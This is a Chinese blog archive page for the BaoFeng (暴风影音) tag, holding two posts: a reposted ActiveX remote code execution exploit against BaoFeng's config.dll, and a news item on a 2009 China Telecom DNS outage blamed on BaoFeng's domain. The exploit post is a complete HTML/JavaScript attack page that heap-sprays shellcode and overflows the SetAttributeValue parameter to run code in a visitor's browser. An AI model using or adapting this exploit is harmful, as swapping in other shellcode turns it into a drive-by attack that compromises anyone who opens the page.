存档

文章标签 ‘暴风影音’

BaoFeng (config.dll) ActiveX Remote Code Execution Exploit

2009年5月25日 没有评论 67 views

#
# BaoFeng (config.dll) ActiveX Remote Code Execution Exploit
# Exploit made by etirah
# Download: www.baofeng.com
#
# Problem DLL    :   config.dll
# Problem Func   :   SetAttributeValue(param1,param2,param3)
# Problem Param  :   param1
#
# References:
#     1. http://forum.eviloctal.com/viewthread.php?tid=35051
#     2. http://www.milw0rm.com/exploits/8579
 

<html>
<body>
<object classid="clsid:BD103B2B-30FB-4F1E-8C17-D8F6AADBCC05" id="target"></object>

<script>
function test()
{
    //show messagebox
    var shellcode = unescape("\u68fc\u0a6a\u1e38\u6368\ud189\u684f\u7432\u0c91\uf48b\u7e8d\u33f4\ub7db\u2b04\u66e3\u33bb\u5332\u7568\u6573\u5472\ud233\u8b64\u305a\u4b8b\u8b0c\u1c49\u098b\u698b\uad08\u6a3d\u380a\u751e\u9505\u57ff\u95f8\u8b60\u3c45\u4c8b\u7805\ucd03\u598b\u0320\u33dd\u47ff\u348b\u03bb\u99f5\ube0f\u3a06\u74c4\uc108\u07ca\ud003\ueb46\u3bf1\u2454\u751c\u8be4\u2459\udd03\u8b66\u7b3c\u598b\u031c\u03dd\ubb2c\u5f95\u57ab\u3d61\u0a6a\u1e38\ua975\udb33\u6853\u6574\u7473\uc48b\u6853\u3a20\u292d\u7468\u2065\u6820\u6168\u6972\ud48b\u5053\u5352\u57ff\u53fc\u57ff\u00f8");
    var bigblock = unescape("%u9090%u9090");
    var headersize = 20;
    var slackspace = headersize+shellcode.length;
    while (bigblock.length<slackspace)
        bigblock+=bigblock;

    fillblock = bigblock.substring(0, slackspace);
    block = bigblock.substring(0, bigblock.length-slackspace);
    while(block.length+slackspace<0x40000)
        block = block+block+fillblock;

    memory = new Array();
    for (x=0; x<300; x++)
        memory[x] = block + shellcode;
    var buffer = '';
    while (buffer.length < 264)
        buffer+=unescape("%u0c0c%u0c0c");
    target.SetAttributeValue(buffer, ":-)", "(-:");
}

test();

</script>
</body>
</html>

分类: 矩阵毒刺 标签: ,

中电信回应多省DNS网络故障:暴风影音网站所致

2009年5月20日 没有评论 65 views

新浪科技讯 5月20日下午消息,针对5月19日多省网络故障,中国电信向新浪科技发来声明表示,其主要原因在于暴风影音网站自身域名解析故障,而目前网络已经完全畅通。

  中国电信解释说,由于暴风影音网站自身域名解析故障,导致中国电信DNS服务器访问量突增,网络处理性能下降。5月19日21:50开始,有江苏、安徽、广西、海南、甘肃、浙江等六省用户申告访问网站速度变慢或无法访问。

  中国电信表示,其收到用户申告之后,立即屏蔽受影响省份存在解析故障的网络地址,至5月19日22:40,中国电信各省DNS服务全部恢复正常,网络已完全通畅。

  中国电信表示,今后将进一步做好网络监控工作,发现异常情况及时处理,尽量减少对用户的影响,保障用户享受到通畅的网络服务。

分类: 业界资讯 标签: ,